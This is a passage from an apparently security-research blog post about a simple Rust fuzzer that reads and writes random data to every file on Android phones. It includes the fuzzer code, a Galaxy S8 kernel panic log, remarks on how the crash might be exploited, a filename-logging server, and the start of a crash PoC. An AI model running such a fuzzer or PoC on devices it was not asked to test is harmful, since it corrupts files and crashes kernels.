<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="n">fd</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">fuzz_size</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">buf</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.write</span><span class="p">(</span><span class="o">&</span><span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">fuzz_size</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>When running this, it pretty much stops right away, getting hung on things like <code class="language-plaintext highlighter-rouge">/sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe</code>. There are typically many <code class="language-plaintext highlighter-rouge">sysfs</code> and <code class="language-plaintext highlighter-rouge">procfs</code> files on the phone that will hang forever when you try to read from them. Since this prevents our “fuzzer” from running any longer, we need to somehow get around blocking reads.</p>
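<p>(An aside: if you wanted to guard each individual read instead, a helper thread plus a timeout does the job with nothing but the standard library. This is a hypothetical sketch, not code from the stream; the function name and path are made up.)</p>

```rust
use std::fs::File;
use std::io::Read;
use std::sync::mpsc;
use std::time::Duration;

/// Read up to `max` bytes from `path` on a helper thread, giving up
/// after `timeout` so a blocking sysfs/procfs read can't hang the caller.
fn read_with_timeout(path: &str, max: usize, timeout: Duration) -> Option<Vec<u8>> {
    let (tx, rx) = mpsc::channel();
    let path = path.to_string();
    std::thread::spawn(move || {
        let mut buf = vec![0u8; max];
        if let Ok(mut fd) = File::open(&path) {
            if let Ok(bytes) = fd.read(&mut buf) {
                buf.truncate(bytes);
                let _ = tx.send(buf);
            }
        }
        // If open/read failed, `tx` is dropped and the receiver errors out
    });
    // A read that blocks past the timeout leaks the helper thread, which
    // is fine for a throwaway fuzzer
    rx.recv_timeout(timeout).ok()
}

fn main() {
    // Hypothetical usage against one of the known-blocking trace files
    let trace = "/sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe";
    match read_with_timeout(trace, 4096, Duration::from_millis(500)) {
        Some(data) => println!("read {} bytes", data.len()),
        None => println!("timed out or unreadable"),
    }
}
```

<p>The post takes an even simpler route below: just throw threads at the problem and accept the losses.</p>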
<p>How about we just make, let’s say… 128 threads and just be okay with some threads hanging? At least some of the others will keep going for a while. Here’s the complete program:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="n">crate</span> <span class="n">rand</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">sync</span><span class="p">::</span><span class="nb">Arc</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="n">OpenOptions</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::{</span><span class="n">Read</span><span class="p">,</span> <span class="n">Write</span><span class="p">};</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">path</span><span class="p">::{</span><span class="n">Path</span><span class="p">,</span> <span class="n">PathBuf</span><span class="p">};</span>
<span class="c">/// Maximum number of threads to fuzz with</span>
<span class="k">const</span> <span class="n">MAX_THREADS</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">128</span><span class="p">;</span>
<span class="c">/// Recursively list all files starting at the path specified by `dir`, saving</span>
<span class="c">/// all files to `output_list`</span>
<span class="k">fn</span> <span class="nf">listdirs</span><span class="p">(</span><span class="n">dir</span><span class="p">:</span> <span class="o">&</span><span class="n">Path</span><span class="p">,</span> <span class="n">output_list</span><span class="p">:</span> <span class="o">&</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o"><</span><span class="p">(</span><span class="n">PathBuf</span><span class="p">,</span> <span class="nb">bool</span><span class="p">,</span> <span class="nb">bool</span><span class="p">)</span><span class="o">></span><span class="p">)</span> <span class="p">{</span>
<span class="c">// List the directory</span>
<span class="k">let</span> <span class="n">list</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="nf">read_dir</span><span class="p">(</span><span class="n">dir</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">list</span><span class="p">)</span> <span class="o">=</span> <span class="n">list</span> <span class="p">{</span>
<span class="c">// Go through each entry in the directory, if we were able to list the</span>
<span class="c">// directory safely</span>
<span class="k">for</span> <span class="n">entry</span> <span class="n">in</span> <span class="n">list</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">entry</span><span class="p">)</span> <span class="o">=</span> <span class="n">entry</span> <span class="p">{</span>
<span class="c">// Get the path representing the directory entry</span>
<span class="k">let</span> <span class="n">path</span> <span class="o">=</span> <span class="n">entry</span><span class="nf">.path</span><span class="p">();</span>
<span class="c">// Get the metadata and discard errors</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">metadata</span><span class="p">)</span> <span class="o">=</span> <span class="n">path</span><span class="nf">.symlink_metadata</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Skip this file if it's a symlink</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_symlink</span><span class="p">()</span> <span class="p">{</span>
<span class="k">continue</span><span class="p">;</span>
<span class="p">}</span>
<span class="c">// Recurse if this is a directory</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_dir</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">,</span> <span class="n">output_list</span><span class="p">);</span>
<span class="p">}</span>
<span class="c">// Add this to the directory listing if it's a file</span>
<span class="k">if</span> <span class="n">metadata</span><span class="nf">.file_type</span><span class="p">()</span><span class="nf">.is_file</span><span class="p">()</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">can_read</span> <span class="o">=</span>
<span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.read</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">();</span>
<span class="k">let</span> <span class="n">can_write</span> <span class="o">=</span>
<span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.write</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="o">&</span><span class="n">path</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">();</span>
<span class="n">output_list</span><span class="nf">.push</span><span class="p">((</span><span class="n">path</span><span class="p">,</span> <span class="n">can_read</span><span class="p">,</span> <span class="n">can_write</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c">/// Fuzz thread worker</span>
<span class="k">fn</span> <span class="nf">worker</span><span class="p">(</span><span class="n">listing</span><span class="p">:</span> <span class="nb">Arc</span><span class="o"><</span><span class="nb">Vec</span><span class="o"><</span><span class="p">(</span><span class="n">PathBuf</span><span class="p">,</span> <span class="nb">bool</span><span class="p">,</span> <span class="nb">bool</span><span class="p">)</span><span class="o">>></span><span class="p">)</span> <span class="p">{</span>
<span class="c">// Fuzz buffer</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buf</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0x41u8</span><span class="p">;</span> <span class="mi">8192</span><span class="p">];</span>
<span class="c">// Fuzz forever</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">rand_file</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">listing</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">can_read</span><span class="p">,</span> <span class="n">can_write</span><span class="p">)</span> <span class="o">=</span> <span class="o">&</span><span class="n">listing</span><span class="p">[</span><span class="n">rand_file</span><span class="p">];</span>
<span class="c">//print!("{:?}\n", path);</span>
<span class="k">if</span> <span class="o">*</span><span class="n">can_read</span> <span class="p">{</span>
<span class="c">// Fuzz by reading</span>
<span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.read</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="n">fd</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">fuzz_size</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">buf</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">fuzz_size</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="o">*</span><span class="n">can_write</span> <span class="p">{</span>
<span class="c">// Fuzz by writing</span>
<span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="nn">OpenOptions</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span><span class="nf">.write</span><span class="p">(</span><span class="k">true</span><span class="p">)</span><span class="nf">.open</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">fd</span><span class="p">)</span> <span class="o">=</span> <span class="n">fd</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">fuzz_size</span> <span class="o">=</span> <span class="nn">rand</span><span class="p">::</span><span class="nn">random</span><span class="p">::</span><span class="o"><</span><span class="nb">usize</span><span class="o">></span><span class="p">()</span> <span class="o">%</span> <span class="n">buf</span><span class="nf">.len</span><span class="p">();</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">fd</span><span class="nf">.write</span><span class="p">(</span><span class="o">&</span><span class="n">buf</span><span class="p">[</span><span class="o">..</span><span class="n">fuzz_size</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Optionally daemonize so we can swap from an ADB USB cable to a UART</span>
<span class="c">// cable and let this continue to run</span>
<span class="c">//daemonize();</span>
<span class="c">// List all files on the system</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">dirlisting</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="nf">listdirs</span><span class="p">(</span><span class="nn">Path</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="s">"/"</span><span class="p">),</span> <span class="o">&</span><span class="k">mut</span> <span class="n">dirlisting</span><span class="p">);</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"Created listing of {} files</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">dirlisting</span><span class="nf">.len</span><span class="p">());</span>
<span class="c">// We wouldn't do anything without any files</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="n">dirlisting</span><span class="nf">.len</span><span class="p">()</span> <span class="o">></span> <span class="mi">0</span><span class="p">,</span> <span class="s">"Directory listing was empty"</span><span class="p">);</span>
<span class="c">// Wrap it in an `Arc`</span>
<span class="k">let</span> <span class="n">dirlisting</span> <span class="o">=</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">dirlisting</span><span class="p">);</span>
<span class="c">// Spawn fuzz threads</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">threads</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
<span class="k">for</span> <span class="mi">_</span> <span class="n">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">MAX_THREADS</span> <span class="p">{</span>
<span class="c">// Create a unique arc reference for this thread and spawn the thread</span>
<span class="k">let</span> <span class="n">dirlisting</span> <span class="o">=</span> <span class="n">dirlisting</span><span class="nf">.clone</span><span class="p">();</span>
<span class="n">threads</span><span class="nf">.push</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="nf">worker</span><span class="p">(</span><span class="n">dirlisting</span><span class="p">)));</span>
<span class="p">}</span>
<span class="c">// Wait for all threads to complete</span>
<span class="k">for</span> <span class="n">thread</span> <span class="n">in</span> <span class="n">threads</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="n">thread</span><span class="nf">.join</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">extern</span> <span class="p">{</span>
<span class="k">fn</span> <span class="nf">daemon</span><span class="p">(</span><span class="n">nochdir</span><span class="p">:</span> <span class="nb">i32</span><span class="p">,</span> <span class="n">noclose</span><span class="p">:</span> <span class="nb">i32</span><span class="p">)</span> <span class="k">-></span> <span class="nb">i32</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">daemonize</span><span class="p">()</span> <span class="p">{</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"Daemonizing</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="nf">daemon</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="c">// Sleep to allow a physical cable swap</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">thread</span><span class="p">::</span><span class="nf">sleep</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="nn">Duration</span><span class="p">::</span><span class="nf">from_secs</span><span class="p">(</span><span class="mi">10</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Pretty simple, nothing crazy here. We get a full phone directory listing, spin up <code class="language-plaintext highlighter-rouge">MAX_THREADS</code> threads, and those threads loop forever picking random files to read and write to.</p>
<p>Let me just give this a little push to the phone annnnnnnnnnnnnnd… <strong>the phone panicked</strong>. In fact, almost all the phones I have at my desk panicked!</p>
<p><em>There we go. We have created a world-class Android kernel fuzzer, printing out new 0-days!</em></p>
<p>In this case we ran this on a Samsung Galaxy S8 (G950FXXU4CRI5), let’s check out how we crashed by reading <code class="language-plaintext highlighter-rouge">/proc/last_kmsg</code> from the phone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Unable to handle kernel paging request at virtual address 00662625
sec_debug_set_extra_info_fault = KERN / 0x662625
pgd = ffffffc0305b1000
[00662625] *pgd=00000000b05b7003, *pud=00000000b05b7003, *pmd=0000000000000000
Internal error: Oops: 96000006 [#1] PREEMPT SMP
exynos-snapshot: exynos_ss_get_reason 0x0 (CPU:1)
exynos-snapshot: core register saved(CPU:1)
CPUMERRSR: 0000000002180488, L2MERRSR: 0000000012240160
exynos-snapshot: context saved(CPU:1)
exynos-snapshot: item - log_kevents is disabled
TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 0
CPU: 1 MPIDR: 80000101 PID: 3944 Comm: Binder:3781_3 Tainted: G W 4.4.111-14315050-QB19732135 #1
Hardware name: Samsung DREAMLTE EUR rev06 board based on EXYNOS8895 (DT)
task: ffffffc863c00000 task.stack: ffffffc863938000
PC is at kmem_cache_alloc_trace+0xac/0x210
LR is at binder_alloc_new_buf_locked+0x30c/0x4a0
pc : [<ffffff800826f254>] lr : [<ffffff80089e2e50>] pstate: 60000145
sp : ffffffc86393b960
[<ffffff800826f254>] kmem_cache_alloc_trace+0xac/0x210
[<ffffff80089e2e50>] binder_alloc_new_buf_locked+0x30c/0x4a0
[<ffffff80089e3020>] binder_alloc_new_buf+0x3c/0x5c
[<ffffff80089deb18>] binder_transaction+0x7f8/0x1d30
[<ffffff80089e0938>] binder_thread_write+0x8e8/0x10d4
[<ffffff80089e11e0>] binder_ioctl_write_read+0xbc/0x2ec
[<ffffff80089e15dc>] binder_ioctl+0x1cc/0x618
[<ffffff800828b844>] do_vfs_ioctl+0x58c/0x668
[<ffffff800828b980>] SyS_ioctl+0x60/0x8c
[<ffffff800815108c>] __sys_trace_return+0x0/0x4
</code></pre></div></div>
<p>Ah cool, derefing <code class="language-plaintext highlighter-rouge">00662625</code>, my favorite kernel address! It looks like some form of heap corruption. We could probably exploit this: if we mapped <code class="language-plaintext highlighter-rouge">0x00662625</code> into userland, we would get to control a kernel-land object from userland, though it would require the right heap groom. This specific bug has been minimized, and you can find a targeted PoC in the <code class="language-plaintext highlighter-rouge">Wall of Shame</code> section.</p>
<h1 id="using-the-fuzzer">Using the “fuzzer”</h1>
<p>You’d think this fuzzer is pretty trivial to run, but there are some things that can really help it along, especially on phones which seem to fight back a bit.</p>
<p>Protips:</p>
<ul>
<li>Restart the fuzzer regularly, as it gets stuck a lot</li>
<li>Do random things on the phone like browsing or using the camera to generate kernel activity</li>
<li>Kill the app and unplug the ADB USB cable frequently, this can cause some of the bugs to trigger when the application suddenly dies</li>
<li>Tweak the <code class="language-plaintext highlighter-rouge">MAX_THREADS</code> value from low values to high values</li>
<li>Create blacklists for files which are known to block forever on reads</li>
</ul>
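<p>The blacklist from that last protip can be as simple as a prefix filter applied before the worker opens a file. A minimal sketch; the specific prefixes here are hypothetical examples, not a curated list:</p>

```rust
use std::path::Path;

/// Hypothetical prefixes for files known to block forever on reads
const BLACKLIST: &[&str] = &[
    "/sys/kernel/debug/tracing",
    "/proc/kmsg",
];

/// Returns true if the fuzzer should skip `path`
fn blacklisted(path: &Path) -> bool {
    let path = path.to_string_lossy();
    BLACKLIST.iter().any(|prefix| path.starts_with(*prefix))
}

fn main() {
    // The worker would check this before opening a randomly picked file
    let picked = Path::new("/sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe");
    println!("skip {:?}: {}", picked, blacklisted(picked));
}
```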
<p>Using the above protips I’ve been able to get this fuzzer to work on almost every phone I have encountered in the past 4 years, with dwindling success as SELinux policies get stricter.</p>
<h1 id="next-device">Next device</h1>
<p>Okay, so we’ve looked at the latest Galaxy S8; let’s try an older Galaxy S5 (G900FXXU1CRH1). <em>Whelp, that one crashed even faster.</em> However, if we try to get <code class="language-plaintext highlighter-rouge">/proc/last_kmsg</code>, we will discover that this file does not exist. We can also try using a fancy UART cable over USB with the magic 619k resistor and <code class="language-plaintext highlighter-rouge">daemonize()</code> the application so we can observe the crash over that. However, that didn’t work in this case either (honestly not sure why; I get dmesg output but no panic log).</p>
<p>So now we have this problem. How do we root-cause this bug? Well, we can do a binary search of the filesystem, blacklisting files in certain folders, and try to whittle it down. Let’s give that a shot!</p>
<p>First, let’s only allow files under <code class="language-plaintext highlighter-rouge">/sys/*</code>; all other files will be disallowed. Typically the bugs this fuzzer finds come from <code class="language-plaintext highlighter-rouge">sysfs</code> and <code class="language-plaintext highlighter-rouge">procfs</code>. We’ll do this by changing the directory listing call to <code class="language-plaintext highlighter-rouge">listdirs(Path::new("/sys"), &mut dirlisting);</code></p>
<p><em>Woo, it worked!</em> Crashed faster, and this time we limited to <code class="language-plaintext highlighter-rouge">/sys</code>. So we know the bug exists somewhere in <code class="language-plaintext highlighter-rouge">/sys</code>.</p>
<p>Now we’ll go deeper into <code class="language-plaintext highlighter-rouge">/sys</code>; maybe we try <code class="language-plaintext highlighter-rouge">/sys/devices</code>… oops, no luck. We’ll have to try another. Maybe <code class="language-plaintext highlighter-rouge">/sys/kernel</code>?… <em>WINNER WINNER!</em></p>
<p>So we’ve whittled it down further to <code class="language-plaintext highlighter-rouge">/sys/kernel/debug</code> but now there are 85 folders in this directory. I really don’t want to manually try all of them. Maybe we can improve our fuzzer?</p>
<h1 id="improving-the-fuzzer">Improving the fuzzer</h1>
<p>So currently we have no idea which files were touched to cause the crash. We could print each filename and view the output over ADB; however, that output doesn’t get synced before the phone panics… we need something even better.</p>
<p>Perhaps we should just send the filenames we’re fuzzing over the network and then have a service that acks the filenames, such that the files are not touched unless they have been confirmed to be reported over the wire. Maybe this would be too slow? Hard to say. Let’s give it a go!</p>
<p>We’ll make a quick server in Rust to run on our host, and then let the phone connect to this server over ADB USB via <code class="language-plaintext highlighter-rouge">adb reverse tcp:13370 tcp:13370</code>, which will forward connections to <code class="language-plaintext highlighter-rouge">127.0.0.1:13370</code> on the phone to our host where our program is running and will log filenames.</p>
<h4 id="designing-a-terrible-protocol">Designing a terrible protocol</h4>
<p>We need a quick protocol that works over TCP to send filenames. I’m thinking something super easy. Send the filename, and then the server responds with “ACK”. We’ll just ignore threading issues and the fact that heap corruption bugs will usually show up after the file was accessed. We don’t want to get too carried away and make a reasonable fuzzer, eh?</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">net</span><span class="p">::</span><span class="n">TcpListener</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::{</span><span class="n">Read</span><span class="p">,</span> <span class="n">Write</span><span class="p">};</span>
<span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-></span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::</span><span class="n">Result</span><span class="o"><</span><span class="p">()</span><span class="o">></span> <span class="p">{</span>
<span class="k">let</span> <span class="n">listener</span> <span class="o">=</span> <span class="nn">TcpListener</span><span class="p">::</span><span class="nf">bind</span><span class="p">(</span><span class="s">"0.0.0.0:13370"</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">buffer</span> <span class="o">=</span> <span class="nd">vec!</span><span class="p">[</span><span class="mi">0u8</span><span class="p">;</span> <span class="mi">64</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">];</span>
<span class="k">for</span> <span class="n">stream</span> <span class="n">in</span> <span class="n">listener</span><span class="nf">.incoming</span><span class="p">()</span> <span class="p">{</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"Got new connection</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">stream</span> <span class="o">=</span> <span class="n">stream</span><span class="o">?</span><span class="p">;</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">bread</span><span class="p">)</span> <span class="o">=</span> <span class="n">stream</span><span class="nf">.read</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">buffer</span><span class="p">)</span> <span class="p">{</span>
<span class="c">// Connection closed, break out</span>
<span class="k">if</span> <span class="n">bread</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c">// Send acknowledge</span>
<span class="n">stream</span><span class="nf">.write</span><span class="p">(</span><span class="n">b</span><span class="s">"ACK"</span><span class="p">)</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to send ack"</span><span class="p">);</span>
<span class="n">stream</span><span class="nf">.flush</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to flush"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">string</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">str</span><span class="p">::</span><span class="nf">from_utf8</span><span class="p">(</span><span class="o">&</span><span class="n">buffer</span><span class="p">[</span><span class="o">..</span><span class="n">bread</span><span class="p">])</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"Invalid UTF-8 character in string"</span><span class="p">);</span>
<span class="nd">print!</span><span class="p">(</span><span class="s">"Fuzzing: {}</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">string</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="c">// Failed to read, break out</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This server is pretty trash, but it’ll do. It’s a fuzzer anyways, can’t find bugs without buggy code.</p>
<h4 id="client-side">Client side</h4>
<p>From the phone we just implement a simple function:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// Connect to the server we report to and pass this along to functions</span>
<span class="c">// threads that need socket access</span>
<span class="k">let</span> <span class="n">stream</span> <span class="o">=</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">Mutex</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">TcpStream</span><span class="p">::</span><span class="nf">connect</span><span class="p">(</span><span class="s">"127.0.0.1:13370"</span><span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to open TCP connection"</span><span class="p">)));</span>
<span class="k">fn</span> <span class="nf">inform_filename</span><span class="p">(</span><span class="n">handle</span><span class="p">:</span> <span class="o">&</span><span class="n">Mutex</span><span class="o"><</span><span class="n">TcpStream</span><span class="o">></span><span class="p">,</span> <span class="n">filename</span><span class="p">:</span> <span class="o">&</span><span class="nb">str</span><span class="p">)</span> <span class="p">{</span>
<span class="c">// Report the filename</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">socket</span> <span class="o">=</span> <span class="n">handle</span><span class="nf">.lock</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to lock mutex"</span><span class="p">);</span>
<span class="n">socket</span><span class="nf">.write_all</span><span class="p">(</span><span class="n">filename</span><span class="nf">.as_bytes</span><span class="p">())</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to write"</span><span class="p">);</span>
<span class="n">socket</span><span class="nf">.flush</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to flush"</span><span class="p">);</span>
<span class="c">// Wait for an ACK</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">ack</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0u8</span><span class="p">;</span> <span class="mi">3</span><span class="p">];</span>
<span class="n">socket</span><span class="nf">.read_exact</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="n">ack</span><span class="p">)</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to read ack"</span><span class="p">);</span>
<span class="k">assert</span><span class="o">!</span><span class="p">(</span><span class="o">&</span><span class="n">ack</span> <span class="o">==</span> <span class="n">b</span><span class="s">"ACK"</span><span class="p">,</span> <span class="s">"Did not get ACK as expected"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<h4 id="developing-blacklist">Developing blacklist</h4>
<p>Okay, so now we have a log of all files we’re fuzzing, and they’re confirmed by the server so we don’t lose anything. Let’s set it to single-threaded mode so we don’t have to worry about race conditions for now.</p>
<p>We’ll see it frequently gets hung up on files. We’ll make note of the files it gets hung up on and start developing a blacklist. This takes some manual labor, and usually there are a handful (5-10) files we need to put in this list. I typically make my blacklist based on the start of a filename, thus I can blacklist entire directories based on <code class="language-plaintext highlighter-rouge">starts_with</code> matching.</p>
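<p>A sketch of that prefix matching (the prefixes here are hypothetical placeholders, not the actual problem files):</p>

```rust
// Hypothetical prefixes of paths that wedge the fuzzer; the real list is
// built up by hand from the filenames acked over the wire.
const BLACKLIST: &[&str] = &[
    "/sys/kernel/debug/tracing",
    "/sys/kernel/debug/usb",
];

// One `starts_with` match knocks out an entire directory tree
fn blacklisted(path: &str) -> bool {
    BLACKLIST.iter().any(|prefix| path.starts_with(prefix))
}
```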
<h4 id="back-to-fuzzing">Back to fuzzing</h4>
<p>So when fuzzing the last file we saw touched was <code class="language-plaintext highlighter-rouge">/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout</code> before a crash.</p>
<p>Let’s hammer this in a loop… and it worked! So now we can develop a fully self contained PoC:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="n">File</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">io</span><span class="p">::</span><span class="n">Read</span><span class="p">;</span>
<span class="k">fn</span> <span class="nf">thrasher</span><span class="p">()</span> <span class="p">{</span>
<span class="c">// Buffer to read into</span>
